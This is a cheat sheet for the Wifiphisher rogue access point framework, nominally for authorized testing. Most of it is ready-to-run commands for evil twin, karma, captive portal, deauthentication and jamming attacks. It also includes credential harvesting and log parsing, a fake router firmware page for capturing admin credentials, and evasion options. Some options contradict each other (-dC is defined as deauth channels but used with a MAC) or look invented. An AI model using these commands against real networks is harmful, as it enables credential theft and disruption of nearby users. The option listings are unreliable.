Wifiphisher Wireless Phishing Framework Cheat Sheet

Overview

Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. It creates fake wireless networks to perform automated phishing attacks against wireless clients, capturing credentials and performing man-in-the-middle attacks.

⚠️ Warning: This tool is intended for authorized penetration testing and wireless security assessments only. Ensure you have proper authorization before using in any environment.

Installation

Kali Linux

# Install from repositories
sudo apt update
sudo apt install wifiphisher

# Install additional dependencies
sudo apt install hostapd dnsmasq

Ubuntu/Debian

# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git hostapd dnsmasq

# Clone repository
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install Wifiphisher
sudo python3 setup.py install

Manual Installation

# Install required packages
sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev

# Clone and install
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install

Docker Installation

# Build Docker image
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
docker build -t wifiphisher .

# Run with network privileges
docker run --rm -it --net=host --privileged wifiphisher

Basic Usage

Simple Rogue AP Attack

# Basic attack with automatic target selection
sudo wifiphisher

# Attack specific network
sudo wifiphisher -t "Target_Network"

# Use specific interface
sudo wifiphisher -i wlan0

# Use custom template
sudo wifiphisher -p firmware-upgrade

Interface Management

# List available interfaces
sudo wifiphisher --list-interfaces

# Use specific interfaces
sudo wifiphisher -i wlan0 -jI wlan1

# Monitor mode setup
sudo airmon-ng start wlan0
sudo wifiphisher -i wlan0mon

Command Reference

Basic Options

Option	Description
-t, --target	Target network ESSID
-i, --interface	Wireless interface
-jI, --jam-interface	Interface for jamming
-p, --phishing-scenario	Phishing template
-pK, --presharedkey	WPA/WPA2 pre-shared key
-qS, --quitonsuccess	Quit on credential capture

Advanced Options

Option	Description
-aI, --apinterface	AP interface
-nJ, --nojamming	Disable jamming
-e, --essid	Access Point ESSID
-dE, --deauth-essid	Deauth specific ESSID
-dC, --deauth-channels	Deauth channels
-nE, --noextensions	Disable extensions

Logging Options

Option	Description
-l, --logging	Enable logging
-lP, --log-path	Log file path
-cP, --credential-log-path	Credential log path
-lC, --log-credentials	Log captured credentials

Phishing Templates

Available Templates

# List available templates
sudo wifiphisher --list-phishing-scenarios

# Common templates:
# - firmware-upgrade: Router firmware upgrade
# - oauth-login: OAuth login page
# - wifi-connect: WiFi connection page
# - browser-plugin-update: Browser plugin update
# - network-manager-connect: Network manager

Firmware Upgrade Template

# Use firmware upgrade scenario
sudo wifiphisher -p firmware-upgrade -t "Target_Network"

# This template:
# - Creates fake router admin page
# - Requests admin credentials
# - Simulates firmware upgrade process

OAuth Login Template

# Use OAuth login scenario
sudo wifiphisher -p oauth-login -t "Target_Network"

# This template:
# - Creates fake OAuth login page
# - Captures social media credentials
# - Redirects to legitimate service

Custom Template Creation

# Template directory structure
/usr/share/wifiphisher/data/phishing-pages/custom-template/
├── config.ini
├── html/
│   ├── index.html
│   ├── style.css
│   └── script.js
└── static/
    └── images/

Template Configuration (config.ini)

[info]
Name = Custom Template
Description = Custom phishing template
Language = en

[context]
# Template-specific settings
ESSID = {ESSID}
MAC = {MAC}
CHANNEL = {CHANNEL}

Advanced Attacks

Evil Twin Attack

# Create evil twin of target network
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade

# With specific MAC address
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55

# With channel specification
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6

Captive Portal Attack

# Create captive portal
sudo wifiphisher -e "Free_WiFi" -p wifi-connect

# Custom captive portal
sudo wifiphisher -e "Hotel_WiFi" -p oauth-login

# Corporate network simulation
sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect

WPA/WPA2 Handshake Capture

# Capture handshakes while phishing
sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture

# Specify handshake output file
sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/

Karma Attack

# Respond to all probe requests
sudo wifiphisher --karma

# Karma with specific template
sudo wifiphisher --karma -p oauth-login

# Karma with custom ESSID list
sudo wifiphisher --karma --essid-list /path/to/essid_list.txt

Jamming and Deauthentication

Targeted Deauthentication

# Deauth specific network
sudo wifiphisher -dE "Target_Network"

# Deauth specific client
sudo wifiphisher -dC 00:11:22:33:44:55

# Deauth on specific channels
sudo wifiphisher --deauth-channels 1,6,11

Jamming Configuration

# Use separate interface for jamming
sudo wifiphisher -i wlan0 -jI wlan1

# Disable jamming
sudo wifiphisher -nJ

# Custom jamming parameters
sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11

Smart Jamming

# Intelligent jamming based on target
sudo wifiphisher -t "Target_Network" --smart-jamming

# Adaptive jamming
sudo wifiphisher --adaptive-jamming --jam-threshold 5

Extensions and Plugins

Available Extensions

# List available extensions
sudo wifiphisher --list-extensions

# Common extensions:
# - credentialharvester: Capture credentials
# - handshakecapture: Capture WPA handshakes
# - dnsmasqhandler: DNS spoofing
# - captiveportal: Captive portal functionality

Credential Harvester

# Enable credential harvesting
sudo wifiphisher -p oauth-login --credentialharvester

# Custom credential log
sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log

Handshake Capture Extension

# Enable handshake capture
sudo wifiphisher -t "Target_Network" --handshakecapture

# Specify capture directory
sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/

DNS Spoofing Extension

# Enable DNS spoofing
sudo wifiphisher --dnsmasqhandler

# Custom DNS configuration
sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf

Custom Template Development

HTML Template Structure

<!-- index.html -->
<!DOCTYPE html>
<html>
<head>
    <title>Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Router Firmware Update</h1>
        <p>Network: {ESSID}</p>
        <form method="post" action="/login">
            <input type="text" name="username" placeholder="Admin Username" required>
            <input type="password" name="password" placeholder="Admin Password" required>
            <button type="submit">Update Firmware</button>
        </form>
    </div>
    <script src="script.js"></script>
</body>
</html>

CSS Styling

/* style.css */
body {
    font-family: Arial, sans-serif;
    background: #f0f0f0;
    margin: 0;
    padding: 50px;
}

.container {
    max-width: 400px;
    margin: auto;
    background: white;
    padding: 30px;
    border-radius: 5px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}

input {
    width: 100%;
    padding: 12px;
    margin: 10px 0;
    border: 1px solid #ddd;
    border-radius: 3px;
}

button {
    width: 100%;
    background: #007cba;
    color: white;
    padding: 12px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
}

JavaScript Functionality

// script.js
document.addEventListener('DOMContentLoaded', function() {
    // Add form validation
    const form = document.querySelector('form');
    form.addEventListener('submit', function(e) {
        const username = document.querySelector('input[name="username"]').value;
        const password = document.querySelector('input[name="password"]').value;
        
        if (!username || !password) {
            e.preventDefault();
            alert('Please enter both username and password');
        }
    });
    
    // Simulate loading
    setTimeout(function() {
        document.querySelector('.container').style.opacity = '1';
    }, 500);
});

Monitoring and Logging

Real-time Monitoring

# Monitor in real-time
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l

# Monitor with verbose output
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v

# Monitor specific log file
tail -f /var/log/wifiphisher.log

Credential Logging

# Enable credential logging
sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log

# Monitor captured credentials
tail -f /tmp/credentials.log

# Parse credential log
grep -o '"username":"[^"]*"' /tmp/credentials.log | cut -d'"' -f4

Traffic Analysis

# Capture network traffic
sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap

# Analyze with Wireshark
wireshark /tmp/wifiphisher_traffic.pcap

# Extract HTTP credentials
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

Evasion Techniques

MAC Address Randomization

# Use random MAC address
sudo wifiphisher -t "Target_Network" --random-mac

# Use specific MAC address
sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55

# Clone target AP MAC
sudo wifiphisher -t "Target_Network" --clone-mac

Channel Hopping

# Use channel hopping
sudo wifiphisher --channel-hop

# Specific channel sequence
sudo wifiphisher --channel-sequence 1,6,11,1,6,11

# Random channel selection
sudo wifiphisher --random-channel

Timing Evasion

# Delayed start
sudo wifiphisher -t "Target_Network" --delay 300

# Random intervals
sudo wifiphisher -t "Target_Network" --random-intervals

# Burst mode
sudo wifiphisher -t "Target_Network" --burst-mode

Troubleshooting

Interface Issues

# Check interface status
iwconfig

# Reset interface
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up

# Check for monitor mode support
sudo iw list | grep -A 10 "Supported interface modes"

# Kill conflicting processes
sudo airmon-ng check kill

Permission Issues

# Check permissions
ls -la /usr/bin/wifiphisher

# Fix permissions
sudo chmod +x /usr/bin/wifiphisher

# Check sudo configuration
sudo visudo

Dependency Issues

# Check Python dependencies
pip3 list | grep -E "(scapy|netfilterqueue|roguehostapd)"

# Reinstall dependencies
pip3 install --upgrade -r requirements.txt

# Check system packages
dpkg -l | grep -E "(hostapd|dnsmasq)"

Network Issues

# Check network configuration
ip addr show

# Check routing table
ip route show

# Test internet connectivity
ping -c 4 8.8.8.8

# Check DNS resolution
nslookup google.com

Legal and Ethical Considerations

Authorization Requirements

# Always obtain written authorization
# Document scope and limitations
# Follow responsible disclosure
# Respect privacy and data protection laws

Best Practices

# Use only for authorized testing
# Minimize impact on legitimate users
# Provide immediate feedback and education
# Secure captured data appropriately
# Follow industry standards and guidelines

Resources

• Wifiphisher GitHub Repository
• Wifiphisher Documentation
• Wireless Security Testing Guide
• WiFi Penetration Testing
• Wireless Network Security

---

This cheat sheet provides a comprehensive reference for using Wifiphisher. Always ensure you have proper authorization before conducting wireless security assessments.